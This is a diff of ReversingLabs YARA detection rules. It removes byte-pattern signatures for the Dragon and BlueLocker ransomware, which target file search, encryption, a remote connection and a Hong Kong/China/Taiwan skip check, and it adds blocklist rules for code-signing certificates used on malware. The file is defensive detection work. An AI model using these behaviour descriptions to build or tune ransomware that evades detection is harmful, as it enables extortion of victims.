 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "7298c5681deaf04abb6a656cefc09b5ee4096ff7a5028caab1d7b107e97be90a"
+		logic_hash = "d25d998c980f47f4da065155451503dcbc677ad041af85a6ed7060ecadec66b3"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Dragon"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$remote_connection_p1 = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
-            33 C5 89 45 ?? 56 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A
-            ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ??
-            85 C0 0F 85 ?? ?? ?? ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? 88 45 ?? 83 EC ?? 89 45 ?? 8B
-            CC 89 A5 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8B CC E8 ??
-            ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8B D0 C6 45 ?? ?? 8D 8D ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 8B F0 68 ?? ?? ?? ?? BA ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 83 C4 ?? 56 8B D0 C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? C6
-            45 ?? ?? 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81 FA ?? ?? ??
-            ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ??
-            ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ??
-            ?? ?? ?? ?? C6 45 ?? ?? 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1
-        }
-		$remote_connection_p2 = {
-            81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ??
-            52 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ??
-            ?? ?? C6 85 ?? ?? ?? ?? ?? C6 45 ?? ?? 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ??
-            ?? ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F
-            87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 8D 4D ?? 8D 55 ?? C7 85 ??
-            ?? ?? ?? ?? ?? ?? ?? 0F 43 4D ?? 51 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 55 ?? 83 FA
-            ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ??
-            83 F8 ?? 77 ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ??
-            ?? ?? ?? ?? C6 45 ?? ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B
-            49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ??
-            64 89 0D ?? ?? ?? ?? 59 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$find_files_1 = {
-            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 57 83 EC ?? 89 8D ??
-            ?? ?? ?? 8B D4 8D 71 ?? C7 42 ?? ?? ?? ?? ?? C7 42 ?? ?? ?? ?? ?? C6 02 ?? 8A 01 41
-            84 C0 75 ?? 2B CE 8B B5 ?? ?? ?? ?? 51 56 8B CA E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 8D
-            85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 8D 85
-            ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F8 83 FF ?? 0F 84 ?? ?? ?? ?? 8B 1D
-        }
-		$find_files_2 = {
-            8A 10 3A 11 75 ?? 84 D2 74 ?? 8A 50 ?? 3A 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 84 D2 75 ??
-            33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? B8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ??
-            8A 11 3A 10 75 ?? 84 D2 74 ?? 8A 51 ?? 3A 50 ?? 75 ?? 83 C1 ?? 83 C0 ?? 84 D2 75 ??
-            33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ??
-            ?? 56 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 51 8B D4 8D 8D ?? ?? ?? ??
-            8D 71 ?? C7 42 ?? ?? ?? ?? ?? C7 42 ?? ?? ?? ?? ?? C6 02 ?? 8A 01 41 84 C0 75 ?? 2B
-            CE 8D 85 ?? ?? ?? ?? 51 50 8B CA E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 84 C0 74 ??
-            83 EC ?? 8B CC 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4
-            ?? F6 85 ?? ?? ?? ?? ?? 74 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8D
-            85 ?? ?? ?? ?? 50 57 FF D3 85 C0 0F 85 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 8B 4D ?? 5F
-            5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$skip_hk_china_taiwan_p1 = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
-            33 C5 89 45 ?? 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ??
-            50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85
-            C0 0F 85 ?? ?? ?? ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? 88 45 ?? 89 45 ?? 8D 4D ?? 6A ??
-            68 ?? ?? ?? ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? 88 45 ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D
-            4D ?? 83 7D ?? ?? 8D 55 ?? 0F 43 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ??
-            ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ??
-            C7 45 ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? 6A ??
-            68 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ??
-            C6 45 ?? ?? 8D 4D ?? 6A ?? 68 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ??
-            C6 45 ?? ?? E8 ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 83 F8
-            ?? 0F 85 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ??
-            ?? ?? 6A ?? 8D 45 ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 8B 55 ??
-            83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83
-            C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 83 FA ?? 72
-            ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8
-            ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 8D ??
-            ?? ?? ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8
-        }
-		$skip_hk_china_taiwan_p2 = {
-            0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 42
-            8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ??
-            ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
-            ?? C6 45 ?? ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83
-            C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? B0 ??
-            8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 8B 55 ??
-            83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83
-            C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 83 FA ?? 72
-            ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8
-            ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 8D ??
-            ?? ?? ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ??
-            0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 42
-            8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51
-            E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ??
-            ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1
-            83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 32 C0 E9 ?? ?? ?? ?? 6A ?? E8
-            ?? ?? ?? ?? E8
-        }
-		$crypt_files = {
-            8B FF 55 8B EC 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 4D ?? 8B 45 ?? 89 45 ?? 89
-            4D ?? 56 8B 75 ?? 85 C9 75 ?? 33 C0 E9 ?? ?? ?? ?? 85 C0 75 ?? E8 ?? ?? ?? ?? 83 20
-            ?? E8 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C8 ?? E9 ?? ?? ?? ?? 53 8B C6
-            8B D6 C1 FA ?? 83 E0 ?? 57 6B F8 ?? 89 55 ?? 8B 14 95 ?? ?? ?? ?? 89 7D ?? 8A 5C 3A
-            ?? 80 FB ?? 74 ?? 80 FB ?? 75 ?? 8B C1 F7 D0 A8 ?? 75 ?? E8 ?? ?? ?? ?? 83 20 ?? E8
-            ?? ?? ?? ?? C7 00 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? F6 44 3A ?? ?? 74 ?? 6A
-            ?? 6A ?? 6A ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 8D 7D ?? AB 56 AB AB E8 ?? ?? ?? ??
-            59 84 C0 74 ?? 84 DB 74 ?? FE CB 80 FB ?? 8B 5D ?? 0F 87 ?? ?? ?? ?? FF 75 ?? 8D 45
-            ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 E9 ?? ?? ?? ?? FF 75 ?? 8B 5D ?? 8D 45 ?? 53
-            56 50 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 8B 4D ?? 8B 55 ?? 8B 04 8D ?? ?? ?? ?? 80 7C 10
-            ?? ?? 7D ?? 0F BE C3 8B 5D ?? 83 E8 ?? 74 ?? 83 E8 ?? 74 ?? 83 E8 ?? 75 ?? FF 75 ??
-            8D 45 ?? 53 56 50 E8 ?? ?? ?? ?? EB ?? FF 75 ?? 8D 45 ?? 53 56 50 E8 ?? ?? ?? ?? EB
-            ?? FF 75 ?? 8D 45 ?? 53 56 50 E8 ?? ?? ?? ?? EB ?? 8B 4C 10 ?? 8D 7D ?? 8B 5D ?? 33
-            C0 AB 6A ?? AB AB 8D 45 ?? 50 FF 75 ?? 53 51 FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ??
-            ?? ?? ?? 89 45 ?? 8D 75 ?? 8D 7D ?? A5 A5 A5 8B 4D ?? 8B 55 ?? 8B 45 ?? 85 C0 75 ??
-            8B 45 ?? 85 C0 74 ?? 6A ?? 5E 3B C6 75 ?? E8 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 89 30 EB ?? 50 E8 ?? ?? ?? ?? 59 EB ?? 8B 04 8D ?? ?? ?? ?? F6 44 10 ?? ?? 74
-            ?? 80 3B ?? 75 ?? 33 C0 EB ?? E8 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 20
-            ?? 83 C8 ?? EB ?? 2B 45 ?? 5F 5B 8B 4D ?? 33 CD 5E E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Joerm.com" and pe.signatures [ i ] . serial == "53:89:cc:62:86:da:3b:fa:1d:c4:df:49:8b:f6:83:61" and 1495497600 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_Ed9Caeb7911B31Bd : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "1eeff730-c2ce-5689-a8cb-455618738a82"
+		date = "2020-08-05"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14148-L14166"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "02cfdf883212387a465af3e692b29b8d0eb8249e0a260f18bec2f662d775b606"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $skip_hk_china_taiwan_p* ) ) and ( all of ( $find_files_* ) ) and ( $crypt_files ) and ( all of ( $remote_connection_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE4\\xB8\\x8A\\xE6\\xB5\\xB7\\xE5\\xA4\\xA9\\xE6\\xB8\\xB8\\xE8\\xBD\\xAF\\xE4\\xBB\\xB6\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and ( pe.signatures [ i ] . serial == "00:ed:9c:ae:b7:91:1b:31:bd" or pe.signatures [ i ] . serial == "ed:9c:ae:b7:91:1b:31:bd" ) and 1506001740 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Bluelocker : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_0Fd2B19A941B7009Cc728A37Cb1B10B9 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects BlueLocker ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "145ff05e-c90d-598a-a3d5-220bd6df718a"
-		date = "2022-08-04"
-		modified = "2022-08-04"
+		id = "125c0b95-82bb-5900-8e8c-4359b8cd18ab"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.BlueLocker.yara#L1-L130"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14168-L14184"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "fbe5f246f4554e63b5da6a0aca169e8221a84fce18fd437ae7ad9b068e9ca576"
+		logic_hash = "6b5cc47f4df9e57c59bc66c32188e02390d4855a1b9e56bd7471fd641a245c3c"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "BlueLocker"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files_p1 = {
-            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 45 ?? 53 56 8B 75 ?? 57
-            8B 7D ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 56 89 55 ?? 89 75 ??
-            89 45 ?? 89 7D ?? FF 15 ?? ?? ?? ?? 8B D8 C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 50 53 FF 15
-            ?? ?? ?? ?? 8B 55 ?? 33 C9 0B C8 89 55 ?? 89 4D ?? 83 FB ?? 75 ?? 0B C3 5F 5E 5B 8B
-            4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 6A ?? 56 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B
-            F0 FF 15 ?? ?? ?? ?? 33 C9 03 F0 83 C6 ?? 0F 92 C1 F7 D9 0B CE 51 E8 ?? ?? ?? ?? 8B
-            F0 83 C4 ?? 89 75 ?? 85 F6 0F 84 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 50 FF 75 ??
-            56 E8 ?? ?? ?? ?? 83 C4 ?? D1 E8 50 56 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 56 E8
-            ?? ?? ?? ?? 83 C4 ?? D1 E8 50 56 E8 ?? ?? ?? ?? 8B 4D ?? 83 C4 ?? 85 C9 0F 8C ?? ??
-            ?? ?? 8B 45 ?? 0F 8F ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 82 ?? ?? ?? ?? 85 C9 0F 8F ?? ??
-            ?? ?? 7C ?? 3D ?? ?? ?? ?? 0F 83 ?? ?? ?? ?? 6A ?? 53 FF 15 ?? ?? ?? ?? 8B 55 ?? 8D
-            4D ?? D1 E8 89 45 ?? E8 ?? ?? ?? ?? 0F B6 4F ?? 0F 57 C0 0F B6 47 ?? C1 E1 ?? 0B C8
-        }
-		$encrypt_files_p2 = {
-            66 0F 13 45 ?? 0F B6 47 ?? C1 E1 ?? 0B C8 C7 45 ?? ?? ?? ?? ?? 0F B6 07 C1 E1 ?? 0B
-            C8 C7 45 ?? ?? ?? ?? ?? 0F B6 47 ?? 89 4D ?? 0F B6 4F ?? C1 E1 ?? 0B C8 0F B6 47 ??
-            6A ?? 6A ?? FF 75 ?? C1 E1 ?? FF 75 ?? 0B C8 0F B6 47 ?? 8B 3D ?? ?? ?? ?? C1 E1 ??
-            0B C8 53 89 4D ?? FF D7 33 F6 8D 45 ?? 56 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF 15
-            ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 0F 1F 40 ?? FF 75 ?? BA ?? ?? ?? ?? 8D 4D ?? E8
-            ?? ?? ?? ?? 8B 4D ?? 83 C4 ?? 33 C0 F7 D9 13 C0 6A ?? 6A ?? F7 D8 50 51 53 FF D7 6A
-            ?? 8D 45 ?? 50 FF 75 ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ??
-            8B 45 ?? 03 F0 3B 75 ?? 0F 87 ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 82 ?? ?? ?? ?? 6A ?? 8D
-            45 ?? 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 85 C0 75 ?? E9 ?? ?? ??
-            ?? 85 C9 7F ?? 7C ?? 3D ?? ?? ?? ?? 73 ?? 8B 75 ?? 8B CB 57 8B D6 E8 ?? ?? ?? ?? 8B
-            3D ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8B 75 ?? 8B CB 57 8B D6 E8 ?? ?? ?? ?? 8B 3D
-            ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8B 55 ?? 8D 4D ?? E8 ?? ?? ?? ?? 0F B6 4F ?? 0F
-        }
-		$encrypt_files_p3 = {
-            57 C0 0F B6 47 ?? C1 E1 ?? 0B C8 66 0F 13 45 ?? 0F B6 47 ?? C1 E1 ?? 0B C8 C7 45 ??
-            ?? ?? ?? ?? 0F B6 07 C1 E1 ?? 0B C8 C7 45 ?? ?? ?? ?? ?? 0F B6 47 ?? 89 4D ?? 0F B6
-            4F ?? C1 E1 ?? 0B C8 0F B6 47 ?? 6A ?? 6A ?? FF 75 ?? C1 E1 ?? FF 75 ?? 0B C8 0F B6
-            47 ?? 8B 3D ?? ?? ?? ?? C1 E1 ?? 0B C8 53 89 4D ?? FF D7 8B 35 ?? ?? ?? ?? 8D 45 ??
-            6A ?? 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF D6 85 C0 74 ?? FF 75 ?? BA ?? ?? ?? ??
-            8D 4D ?? E8 ?? ?? ?? ?? 8B 4D ?? 83 C4 ?? 33 C0 F7 D9 13 C0 6A ?? 6A ?? F7 D8 50 51
-            53 FF D7 6A ?? 8D 45 ?? 50 FF 75 ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 85 C0 74 ??
-            81 7D ?? ?? ?? ?? ?? 72 ?? 6A ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF D6
-            85 C0 75 ?? 8B 75 ?? 6A ?? 0F 57 C0 6A ?? 66 0F 13 45 ?? FF 75 ?? FF 75 ?? 53 FF D7
-            6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D0 C7 45 ?? ?? ?? ?? ?? 83 C4 ?? 89 55 ?? C7
-            45 ?? ?? ?? ?? ?? 85 D2 74 ?? 8B FA B9 ?? ?? ?? ?? F3 A5 8B 4D ?? 68 ?? ?? ?? ?? 8B
-            01 8B 49 ?? 89 82 ?? ?? ?? ?? 8D 45 ?? 50 52 6A ?? 6A ?? 6A ?? FF 75 ?? 89 8A ?? ??
-            ?? ?? FF 15 ?? ?? ?? ?? 8B 75 ?? 85 C0 74 ?? 6A ?? 8D 45 ?? 50 FF 75 ?? 56 53 FF 15
-            ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 33 F6 EB ?? 83 CE ?? 85 DB 74 ?? 53 FF 15 ??
-            ?? ?? ?? 8B 7D ?? 57 FF 75 ?? FF 15 ?? ?? ?? ?? EB ?? 8B 7D ?? 57 E8 ?? ?? ?? ?? 8B
-            4D ?? 83 C4 ?? 8B C6 33 CD 5F 5E 5B E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$find_files_p1 = {
-            FF 74 B4 ?? 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 46 83
-            FE ?? 7C ?? FF 74 24 ?? FF D7 68 ?? ?? ?? ?? 8B F0 FF D7 03 F0 8D 84 24 ?? ?? ?? ??
-            6A ?? 50 FF D7 8D 0C 06 33 C0 83 C1 ?? 0F 92 C0 F7 D8 0B C1 50 E8 ?? ?? ?? ?? 8B F0
-            83 C4 ?? 85 F6 0F 84 ?? ?? ?? ?? FF 74 24 ?? FF D7 48 50 FF 74 24 ?? 56 E8 ?? ?? ??
-            ?? 83 C4 ?? D1 E8 50 56 E8 ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? 50 56 E8 ?? ??
-            ?? ?? 83 C4 ?? D1 E8 50 56 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ??
-            83 C4 ?? D1 E8 50 56 E8 ?? ?? ?? ?? 8B 7C 24 ?? 83 C4 ?? 83 C7 ?? 57 FF 15 ?? ?? ??
-            ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 8B C8 83 C4 ?? 85 C9 74 ?? 8B 54 24 ?? C7 01 ?? ?? ??
-            ?? C7 41 ?? ?? ?? ?? ?? 83 7A ?? ?? 75 ?? 89 4A ?? 89 4A ?? 57 89 31 FF 15 ?? ?? ??
-            ?? E9 ?? ?? ?? ?? 8B 42 ?? 89 48 ?? 8B 42 ?? 8B 40 ?? 89 42 ?? 89 30 57 FF 15 ?? ??
-            ?? ?? E9 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 33 F6 C7 44 24 ?? ?? ?? ?? ?? C7 44 24
-            ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ??
-            ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24
-            ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ??
-            ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24
-            ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ??
-            ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? FF 74 B4 ?? 8D 84 24
-        }
-		$find_files_p2 = {
-            50 FF D3 85 C0 0F 85 ?? ?? ?? ?? 46 83 FE ?? 7C ?? 6A ?? FF 74 24 ?? FF D7 8B F0 8D
-            84 24 ?? ?? ?? ?? 50 FF D7 03 F0 33 C0 83 C6 ?? 0F 92 C0 F7 D8 0B C6 50 E8 ?? ?? ??
-            ?? 8B F0 83 C4 ?? 85 F6 0F 84 ?? ?? ?? ?? FF 74 24 ?? FF D7 48 50 FF 74 24 ?? 56 E8
-            ?? ?? ?? ?? 83 C4 ?? D1 E8 50 56 E8 ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? 50 56
